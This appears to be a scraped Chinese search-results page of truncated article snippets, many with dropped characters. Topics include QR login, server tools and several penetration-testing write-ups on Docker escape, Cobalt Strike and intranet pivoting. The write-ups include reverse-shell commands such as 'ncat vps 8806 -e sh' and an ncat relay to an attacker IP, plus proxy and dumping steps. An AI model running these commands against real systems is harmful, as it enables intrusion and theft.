首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

网站提示微信码登录,他们是怎么实现的?

那它是怎么做的呢? 小傅哥,先举个这样登录的例子,让大家熟悉下这个业务场景。 通过这样的一个页面效果展示,我们粗略的可以知道,用户页面不断的 checkScan 检测,是需要用到一个唯一ID值。...而当用户微信码后,这个唯一ID值则可以通过微信公众号获取到并保存,同时创建出唯一ID 和 Token 的映射关系。...接下来小傅哥就给大家分享下,怎么来实现一下这个方案。 文末提供了「星球:码农会锁」优惠加入方式,以及本节课程的代码地址。...https://natapp.cn/ 购买后,配置你的隧道本地端口为 8091 也就是你本地 SpringBoot 程序的端口。...如果你不是 8091 端口,可以修改为其他的 软件下载,内网穿透需要一个本地的软件。你可以从它的网站下载。

2.8K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    宝塔远程桌面助手怎么(Linux 服务器)

    话说魏艾斯博客平时的 SSH 链接软件是 Xshell,这种软件有一个好用顺手的就行了。前几天有一个萌新问老魏:看到宝塔远程桌面助手有 Linux 服务器选项,不知道怎么。...那么今天老魏就来说一下宝塔远程桌面助手怎么(Linux 服务器)。 老魏写过宝塔远程桌面助手使用教程,适用于 Windows 服务器。...看上图把你 VPS 服务器的 IP 地址和端口号输入,选择 Linux 服务器,输入服务器的账号密码,点击连接,就可以登录到 Linux 服务器上了。 ?...眼尖的同学会发现宝塔远程助手的 Linux 实现方法其实是调用了 PuTTY 来实现的,所以如果你会使用别的 SSH 连接软件,那么这个也没问题。...相关知识:如何下载安装使用 SSH 软件 总体来说宝塔远程桌面助手是一款多用途的远程桌面软件,Windows 服务器和 Linux 服务器都可以,方便又容易上手,只要你有在使用 VPS 服务器备一个还是蛮实用的

    16.2K40

    记一次未完成的实战内网渗透

    文件中,替换hta文件中箭头的双引号部分 然后将hta文件上传到vps,接着利用python自带的命令,开启一个临时web 然后设置msf监听,这里设置x86的版本payload 然后在jboss...端中查看不了该类命名文件 于是还是决定上线一个cs在做后续,因为CS可以下载桌面文件,这里肯定会有人问我为啥不远程连接3389,我这里先说一下连接3389,我这里连接不上,因为可能是阿里云做了限制不允许外联,只能从别的地方下手了...msf上传过去,然后在shell端执行,即可上线 那么目前可以想到的就是继续做信息搜集,或者横向移动,这里决定先做信息搜集,先将桌面文件下载下来,但是这里下载后发现文件并打不开,不知道这里的lnk文件怎么变成了...这里引用3h师傅的文章,打字太累了,偷懒一下 最后就成功连接上了 然后通过域控查找的命令,可以看到当前机器不在域中,那么就要想办法先进入到一台域机器中 这里使用3h师傅之前给命令探测内网存活主机,cs...这些工具不出来的时候,就可以考虑使用这个 for /l %i in (1,1,255) do @ ping 192.168.2.

    70010

    记一次逃逸Docker的渗透测试

    大概率是shiro 由于这个环境并不稳定,请求多了就卡住(自带防御属性啊~) https://github.com/tangxiaofeng7/Shiroexploit 判断可以出网后把shell反弹到vps...执行命令验证是否为docker环境: 确实为docker环境,那么就看看宿主机有没有什么漏洞可以利用,使用 cat /etc/hosts,看到了主机IP为 192.168.16.2: 到这里本来想代理流量本地开工具的...-9999] 1>> 1.txt 2>/dev/null 命令执行完了查看文件发现两个端口开着服务,一个是SSH: 一个是9000端口的Portainer面板: 那么思路来了,要么爆破进行SSH,要么爆破进...Portainer,接下来可以上代理了,继续wget下载到docker里: Docker上执行: chmod +x ligolo_linux_amd64 && ligolo_linux_amd64 -...relayserver=0.0.0.0:88 88端口用于docker和vps通信,103端口用于开放socks代理。

    1.7K20

    使用iptables设置保护青龙端口,避免被爆破

    所以研究了一下怎么禁止其他人访问青龙端口。...探索 由于是通过docker暴露的端口,iptables处理INPUT规则前就把网络请求转给DOCKER的虚拟网卡了, 所以普通iptables禁止端口访问的设置是没有效果的。...禁止访问青龙端口 执行下面代码,以禁止所有IP访问青龙的5700端口: iptables -I DOCKER-USER -p tcp -m conntrack --ctorigdstport 5700...第三条命令是给我一个VPS的IP开放端口的,如果遇到以外,还可以通过该VPS中转访问青龙页面。因为是固定IP,所以子网是/32,只放行这一个IP。 如果只放行一个IP(段),执行一条命令即可。...完毕后执行下面命令保存IPTABLES规则: service iptables save 清除登陆错误次数 如果青龙已经被人的不能登陆了(需要等很久后才能登陆),可以进入宿主机执行下面命令清除青龙的登陆错误次数

    8110

    干货|后渗透及内网初体验的总结

    ,那先尝试提权 能弹shell但是接收不到的时候,可以看一下目标是不是限制出网或者限制出站端口 如果限制出网那就先尝试提权,如果限制出站端口可以批量试一下常见的端口,在自己的vps上,通过nginx监听多个端口来快速启动多个端口...,然后再在目标机器上上传个sh脚本,批量curl自己vps的指定端口,最后看一下结果就可以了,nmap ---top-ports 100或1000可以扫描nmap整理的100或1000个最常用的端口,可以参考一下...如果要修改执行的间隔可以研究一下cron的语法,上面的是每分钟弹一次shell 内网 信息收集 激动人心的时刻来了,打内网 因为我拿到的shell都是linux下的,没有类似windows上的域控等等,所以此处就端口...,所以建个代理还是很有必要的 此处我推荐frp,然后依旧遵循动静小点的原则,不在目标机器上开端口,在自己的vps上架设frp的服务端,在目标机器上架设frp的客户端,然后在客户端启用socks5代理插件...vps上,实现通过转发出网 通过ncat转发出网: 中转的机器执行: ncat -l 中转机器接收内网反弹来的shell的端口 -c 'ncat 攻击机的ip 攻击机的端口' 这样攻击机就可以接收到不出网的设备弹的

    1K90

    记一次渗透测试利用Portainer进行docker逃逸获得宿主机Ubuntu权限。

    大概率是shiro 由于这个环境并不稳定,请求多了就卡住(自带防御属性啊~) https://github.com/tangxiaofeng7/Shiroexploit 判断可以出网后把shell反弹到vps...执行命令验证是否为docker环境: 确实为docker环境,那么就看看宿主机有没有什么漏洞可以利用,使用 cat /etc/hosts,看到了主机IP为192.168.16.2: 到这里本来想代理流量本地开工具的...-9999] 1>> 1.txt 2>/dev/null 命令执行完了查看文件发现两个端口开着服务,一个是SSH: 一个是9000端口的Portainer面板: 那么思路来了,要么爆破进行SSH,要么爆破进...Portainer,接下来可以上代理了,继续wget下载到docker里: Docker上执行: chmod +x ligolo_linux_amd64 && ligolo_linux_amd64 -...relayserver=0.0.0.0:88 88端口用于docker和vps通信,103端口用于开放socks代理。

    6.1K20

    【操作】Cobalt Strike 中 Bypass UAC

    BypassUAC 方法测试 MSF 和 CS 联动来 Bypass UAC MSF → Meterpreter 方向弹 shell 0x02 Cobalt Strike 中的提权命令 一些后渗透命令要求系统管理员级别的权限...因为我个人的贫穷,我一直的我朋友的一台 低配 VPS(内存可能 512),所以我在这仅仅的一台 VPS 上同时开了 CS 团队服务器和 MSF,最终导致了内存不足的结果。 贫穷的我继续借 VPS。...要弹回的肯定是 reverse_tcp 监听器的端口,这个监听器肯定不可能开在 50050 端口上啊,团队服务器都占用了不是?...所以我很怀疑写那篇文章的人怎么弹回到 50050 端口的,除非他把团队服务器的默认端口改了…… 总之,重新设置 lport,使其与 windows/beacon_http/reverse_http 监听器的端口对应...0x07 后续学习 关于 UAC 的学习路线: UAC 是什么 什么情况下会出现 UAC 针对不同的系统版本怎么正常绕 UAC 针对不同的系统版本怎么免杀绕 UAC 绕过 UAC 之后怎么免杀执行自己的

    1.6K10

    宝塔 linux 面板常见问题解答

    3、宝塔重启 VPS 服务器和重启面板 登陆宝塔面板后的首页,上面就能看到“重启服务器”和“重启面板”的按钮,点击后如下图所示,点击确定即可重启。 ?...5、宝塔面板修改端口 如果你想做项目添加别的端口就直接添加好了,记得输入一个不容易被猜到的数字,写上备注,最后点击放行即可。 以默认的 SSH 端口为例子说一下。...以上修改 22 端口顺序别搞混了,否则会进不去宝塔面板。 ? 6、宝塔怎么配置 SFTP SFTP 不需要设置,无论宝塔面板还是 lnmp 环境都不用设置。...SFTP 账号密码可以在你购买的 VPS 服务器后台找到,账号一般是 root。相关的文章可以阅读:SFTP 和 FTP 的区别及 SFTP 代替 FTP,里面有具体操作方法。...可以 SFTP 软件来实现同样功能,参考WinSCP-SFTP 管理传输软件安装使用教程。 ?

    3.8K51

    HCTF2016 ATField writeup

    火日师傅、NSIS、FlappyPig的师傅在结束前应该是存在有效payload,Orz 题目描述 Welcome to ATField. hint: 1: 在第一题里不只有flag,还有第二题的入口 2、端口没用...绕过,绕过ssrf之后,大部分人都选择了127.0.0.1的端口,想找到本地开启的服务。...u=http://127.0.0.1 在有域名的vps上写一个跳转页面实现,事实上,只有第二种做法可以顺利继续做下一题 AT Field2 到了这里,很容易误解认为要本机的服务,所以及时放出了3个提示...1: 在第一题里不只有flag,还有第二题的入口 2、端口没用,几百线程也没用的呀 3、我从来没说过,flag1那里没有别的东西啊 不能说提示有多明显吧,但是我相信从hint不难得出,在上一个flag...所在页面,存在一些别的未知的文件,那么抄起目录的脚本,跑一跑,很快找到http://127.0.0.1/README.md base64解码得到 11.23 ak说上线的.git要都删了,以免被拖源码

    20910

    内网漫游之SOCKS代理大结局

    3、在左侧的My PC机上mstsc登陆139.XXX.XX.113:5555或者在VPSmstsc登陆127.0.0.1:5555。...该命令意思是在A主机上利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来。 D. 返回我们公网VPS的CMD界面下,可以看到已经连接成功了。 ?...在左侧公网VPS上运行命令,将1080端口收到的代理请求转交给888端口: ew -s rcsocks -l 1080 -e 888 B.在A主机上运行命令,将公网VPS的888端口和B主机的999端口连接起来...我在代理下扫描工具一般都是proxychains,大家接着往下看!...如上图所示,均表示相当好使,我们最后再试试大杀器-Metasploit可不可以。 ? 我们随便找个IP端口,如下图所示,已经开始扫描了。 ? 其他工具就不再一一介绍了。 TheEnd.

    2.2K10

    bugku渗透(一)

    访问一下,源码得到flag 图片 PS:下个flag网站管理员才能看到哦 flag{f42f76f14f9cce709a39b3bdad69a627} 场景二 这个应该就是网站后台吧,dirsearch一下...f3b1bce4b65eea538acd840cb304c051} 场景四 这道应该就是和数据库有关系了,同时涉及到权限 find一下database,寻找config.php的相关配置 图片 得到root为root/root nmap一下开放端口...图片 图片 发现3306mysql端口并没有打开,搜了一下可以直接在蚁剑里mysqldump dump下来 mysqldump -uroot -proot flag > flag.sql...上shell,蚁剑终端不舒服 ncat vps 8806 -e sh 图片 弹错shell了,应该是shiro反序列化的那个靶机 写入内存马 图片 连不上,我不李姐 这里python来反弹...flag 图片 flag{a790c8d551bbe198354f427c9fff6837} 场景九 Internal network 擦,感觉该进内网了,没ipconfig,有git,猜我怎么想的

    1K20

    matinal:linux管理工具:WinSCP使用教程

    如果你购买的云主机或VPS主机是Linux系统,会发现与原来的虚拟主机想比,有些用不来,因为管理主机需要登录SSH。...现在的VPS或云主机都有一键安装包和主机面板,所以WinSCP的作用就小了很多,它除了删除,上传下载,移动,修改,压缩,解压缩文件,我实在想不出它还有什么别的作用。...文件协议默认SFTP连接,端口号一般也是22,如非自己改了端口,WinSCP也可以当做FTP工具使用,把文件协议下拉菜单,选择FTP即可。...如果解压缩.tgz文件的话,可以下边的untar/gzip的命令菜单。...管理主机 5、如果要是解压缩的格式是别的格式怎么办呢,可以Ctar+T调出命令窗口,或在底部右键选择命令行,会出现输入命令的小窗口。

    67710

    【工具】信息收集平台之 H

    项目作者:SiJiDo 项目地址:https://github.com/SiJiDo/H 文案排版:释然IT杂谈 一、软件介绍: H是一款强大的资产收集管理平台,主要用于src信息收集和红蓝对抗资产收集,...实现以下功能: 域名扫描 端口扫描 web站点扫描 目录扫描 漏洞扫描(nuclei, 自定义poc, xray+rad) host碰撞插件 apk域名提取插件 备案信息查询 fofa...系统设置模块 该模块几个参数 同时扫描任务上限,这里的2意思是可以2个项目一起并行,但是也需要节点数量够,大部分节点都是多线程,多进程,部分如域名扫描时单进程(后续优化) 自定义poc地址,这里填你...poc管理的github或者gitee地址,国内vps建议gitee,更新拉取的时候不会出错,poc格式参照nuclei的格式即可,在扫描模式勾选了自定义poc会从你在此次设定的github地址拉取你的...扫描模式预设了2个模式,full和normal,里面有组件勾选 注意:如果选择了对应的组件,但该组件没有节点连接,则会项目卡在该阶段一直等待 定时模块 定时模块主要作用是,比如一个src项目需要每个月一次

    88210

    Ladon捕获0day payload批量getshell

    当然也可以使用WireShark等抓包工具,但是又不会用怎么办?没事使用Ladon一条命令就搞定,非常简单。...0x004 捕获0day、1day 不知道大家有没发现,现在随便在一台VPS上开启个端口,几天之内,就有好几个扫描器光顾。...,就监听哪个端口,当然越多越好,因为不同WEB应用,可能有它的特定端口,别人特定漏洞的包你可以轻松记录下来,看到没见过的POC,它不就是0day咯,当然这个概率可能比较低,或者抓到的是不太重要的0day...0x009 获取目标外网IP 在VPS上一键开启WEB后,目标访问http://vpsIP/ip.jpg,返回目标外网IP 0x010 检测目标是否允许HTTP出网 在VPS上一键开启WEB后,目标访问...早期都是TCP协议实现,之后FTP、HTTP(什么网盘、邮箱、博客等都是并非什么新方式只是换个网址或API而已),大家常用的CS也是HTTP协议,本文Ladon来实现个简单的C2。

    1.6K10
    领券